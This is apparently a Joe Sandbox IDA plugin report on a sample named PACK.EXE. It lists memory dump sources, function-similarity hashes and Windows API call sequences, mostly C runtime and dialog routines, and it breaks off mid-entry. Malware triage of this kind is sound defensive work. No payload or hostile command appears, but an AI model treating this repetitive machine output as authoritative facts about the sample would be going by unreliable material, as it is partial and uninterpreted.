                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                            • String ID: 6P+$CorExitProcess$mscoree.dll
                                                                                                                                                                            • API String ID: 4061214504-2165518698
                                                                                                                                                                            • Opcode ID: 810ef91e4d7401351d31f96bd787310dd8989051246297717f1cce9a9c8d8914
                                                                                                                                                                            • Instruction ID: dda3fe58ae641768091db934cf5ddaaf29615c1977e16f21ec2c86ff649fd664
                                                                                                                                                                            • Opcode Fuzzy Hash: 810ef91e4d7401351d31f96bd787310dd8989051246297717f1cce9a9c8d8914
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF08131A0420CBBDB269B91DC0DFAEBBB9EF44715F000068FA45E6190DF354A44DB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE096E
                                                                                                                                                                              • Part of subcall function 00FDA995: GetVersionExW.KERNEL32(?), ref: 00FDA9BA
                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FE0990
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FE09AA
                                                                                                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FE09BB
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE09CB
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE09D7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2092733347-0
                                                                                                                                                                            • Opcode ID: 73d8d397ce02664b7d45a8133b531008860f7c35e5bb340bf98e2ccfc3065e69
                                                                                                                                                                            • Instruction ID: b93c6d8aca59f3324f118575d3f8397e9189f454de63ea84ce8f222f77a5fbfc
                                                                                                                                                                            • Opcode Fuzzy Hash: 73d8d397ce02664b7d45a8133b531008860f7c35e5bb340bf98e2ccfc3065e69
                                                                                                                                                                            • Instruction Fuzzy Hash: AF31D57A1083469AC710DFA5C8849ABB7F9FF98704F04492EF999C3211EB34D549CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                            • Opcode ID: a61016e0a107088b53ec8811021b4805f3b6dcc0eac060a994a5086a043cd511
                                                                                                                                                                            • Instruction ID: d0de72d3cf7289e43012c39a97131cae48203f7194da8cff5842cc2b9a2e5995
                                                                                                                                                                            • Opcode Fuzzy Hash: a61016e0a107088b53ec8811021b4805f3b6dcc0eac060a994a5086a043cd511
                                                                                                                                                                            • Instruction Fuzzy Hash: F521FB7260024AAFEB14AA17CC81F3B73AC9B517D4F244539FC4CDA101E634ED46A2B5
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,010100E0,00FF3394,010100E0,?,?,00FF2E0F,?,?,010100E0), ref: 00FF851A
                                                                                                                                                                            • _free.LIBCMT ref: 00FF854D
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8575
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF8582
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF858E
                                                                                                                                                                            • _abort.LIBCMT ref: 00FF8594
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                            • Opcode ID: 56534b2858e2c0d8e4ea46dac964c31a80618e5afd5cc9441ece426a83a58cd8
                                                                                                                                                                            • Instruction ID: 066672b8ed645ac591628686234ae7b08a6267331207714c07243dca6f0470e4
                                                                                                                                                                            • Opcode Fuzzy Hash: 56534b2858e2c0d8e4ea46dac964c31a80618e5afd5cc9441ece426a83a58cd8
                                                                                                                                                                            • Instruction Fuzzy Hash: 78F0F93664870827C31273346C49F3A315A8FD1BB1F2D0114F754A7176EF6D8A03B224
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00FF34E6,00000000,00000000,00FF451B,?,00FF451B,?,00000001,00FF34E6,31E85006,00000001,00FF451B,00FF451B), ref: 00FFB637
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FFB6C0
                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FFB6D2
                                                                                                                                                                            • __freea.LIBCMT ref: 00FFB6DB
                                                                                                                                                                              • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 2652629310-3080146196
                                                                                                                                                                            • Opcode ID: 255a7dbda072f3502fa68e683007deace3c4fbe55898fb0bdb01ab07f371ccf4
                                                                                                                                                                            • Instruction ID: f3193c47948fe40f861f01f3c1d221aca84a59820c09455947e10a9f3c950966
                                                                                                                                                                            • Opcode Fuzzy Hash: 255a7dbda072f3502fa68e683007deace3c4fbe55898fb0bdb01ab07f371ccf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 88319F72A0020EABDF259F65DC45DBE7BA5EF44710F144168FE04D61A0E739DD50DBA0
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FEC2F2
                                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FEC308
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FEC322
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00FEC32D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: RENAMEDLG
                                                                                                                                                                            • API String ID: 445417207-3299779563
                                                                                                                                                                            • Opcode ID: a11a03878e8738e8c7c6785c346df9d3647bcc6f7343e3f24f415e35578fce30
                                                                                                                                                                            • Instruction ID: 552e94a4e1ebbb95c7465216bf5844a432ff46821dcbe9a29e9cceca26db65b6
                                                                                                                                                                            • Opcode Fuzzy Hash: a11a03878e8738e8c7c6785c346df9d3647bcc6f7343e3f24f415e35578fce30
                                                                                                                                                                            • Instruction Fuzzy Hash: FA012833A402587ED6325EEA5D45F377B6CEB5AB10F10401AF381B7084C6976C02B7B5
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00FFABAF
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FFABD2
                                                                                                                                                                              • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FFABF8
                                                                                                                                                                            • _free.LIBCMT ref: 00FFAC0B
                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FFAC1A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                            • Opcode ID: e96985a43343b9cf2544f54135084a8104282f7fc4afdd8cec416197df134772
                                                                                                                                                                            • Instruction ID: 02690800c67ef8eb9bb9554af1b5a4a8b8b091201765d26f369deff4383a66f7
                                                                                                                                                                            • Opcode Fuzzy Hash: e96985a43343b9cf2544f54135084a8104282f7fc4afdd8cec416197df134772
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A0188B2A016197F233217B66C4CD7F796DDEC6B703154119FB08D3255EA65CD01A2B1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00FF7ED1,00FF7B6D,?,00FF8544,00000001,00000364,?,00FF2E0F,?,?,010100E0), ref: 00FF859F
                                                                                                                                                                            • _free.LIBCMT ref: 00FF85D4
                                                                                                                                                                            • _free.LIBCMT ref: 00FF85FB
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF8608
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF8611
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                            • Opcode ID: ae1c0ca022ec7cc3b238ab4e3ad93f99f00a24de77060a409a2ecc205e00f276
                                                                                                                                                                            • Instruction ID: 65696c5dc1e732b4a8bc13e0c61870f3de51c789fe5be2fa50492b78c2190409
                                                                                                                                                                            • Opcode Fuzzy Hash: ae1c0ca022ec7cc3b238ab4e3ad93f99f00a24de77060a409a2ecc205e00f276
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E0126776087082BC71273746C89B3B35198FC1BB0B2A0024FB45E2277EE6E8D037224
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FE0697: ResetEvent.KERNEL32(?), ref: 00FE06A9
                                                                                                                                                                              • Part of subcall function 00FE0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FE06BD
                                                                                                                                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FE03FB
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?), ref: 00FE0415
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00FE042E
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FE043A
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FE0446
                                                                                                                                                                              • Part of subcall function 00FE04BA: WaitForSingleObject.KERNEL32(?,000000FF,00FE05D9,?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04C0
                                                                                                                                                                              • Part of subcall function 00FE04BA: GetLastError.KERNEL32(?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04CC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1868215902-0
                                                                                                                                                                            • Opcode ID: 22bd2a9e271b748bbf100f1433dd2cd403baf89314413f9ab1beb2f01f378f15
                                                                                                                                                                            • Instruction ID: 3adb69d5cdafb46dd499922df29db9e39b7f036e1aa9d83328eb541170ba9bb2
                                                                                                                                                                            • Opcode Fuzzy Hash: 22bd2a9e271b748bbf100f1433dd2cd403baf89314413f9ab1beb2f01f378f15
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B01B572400744EBC732DF65DD88FC6BBEAFB44710F004519F19A92195CBBA6994DB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB479
                                                                                                                                                                              • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
                                                                                                                                                                              • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB48B
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB49D
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB4AF
                                                                                                                                                                            • _free.LIBCMT ref: 00FFB4C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 99af8e41e9ba5331d4309f25cf120fcf1623b89448bc9bf813abfc632234de8a
                                                                                                                                                                            • Instruction ID: 95159b28d19035a8eff854d45bba4f75fb5913cc06ddd30bbc644566c95dc3c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 99af8e41e9ba5331d4309f25cf120fcf1623b89448bc9bf813abfc632234de8a
                                                                                                                                                                            • Instruction Fuzzy Hash: 15F04432904608A78521FFE4F985C3AB3D9AE00B207654806F28DD7535CB2DFC80A764
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00FF75F9
                                                                                                                                                                              • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
                                                                                                                                                                              • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
                                                                                                                                                                            • _free.LIBCMT ref: 00FF760B
                                                                                                                                                                            • _free.LIBCMT ref: 00FF761E
                                                                                                                                                                            • _free.LIBCMT ref: 00FF762F
                                                                                                                                                                            • _free.LIBCMT ref: 00FF7640
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 0de06f99480fe3f796b29d05934ac29f0da55df5739464fee3169d9b12c92af3
                                                                                                                                                                            • Instruction ID: b28b1d2cd796838dcbceb2877211b9bf6df8513b7bd2fd64b960488488a7b5ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 0de06f99480fe3f796b29d05934ac29f0da55df5739464fee3169d9b12c92af3
                                                                                                                                                                            • Instruction Fuzzy Hash: 54F030B080671C8BC626BF65BC0142A77A8BB05B207071116F3919667DCB3F1651ABD5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 0-3080146196
                                                                                                                                                                            • Opcode ID: 32415a77fdc2dae908009ab81ecbb9f97b00e467d5594730dfbf479c4ae65bbc
                                                                                                                                                                            • Instruction ID: b8ed9699c1b5fe77e66f87bf3bcf7e15debfe35380f7fc3fea1af603c72b2c32
                                                                                                                                                                            • Opcode Fuzzy Hash: 32415a77fdc2dae908009ab81ecbb9f97b00e467d5594730dfbf479c4ae65bbc
                                                                                                                                                                            • Instruction Fuzzy Hash: 1251B371D0020E9BDB11AFA4CC85FBEBBB8AF45324F140445F711A72B2D6799A01EB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000104), ref: 00FF6CB3
                                                                                                                                                                            • _free.LIBCMT ref: 00FF6D7E
                                                                                                                                                                            • _free.LIBCMT ref: 00FF6D88
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
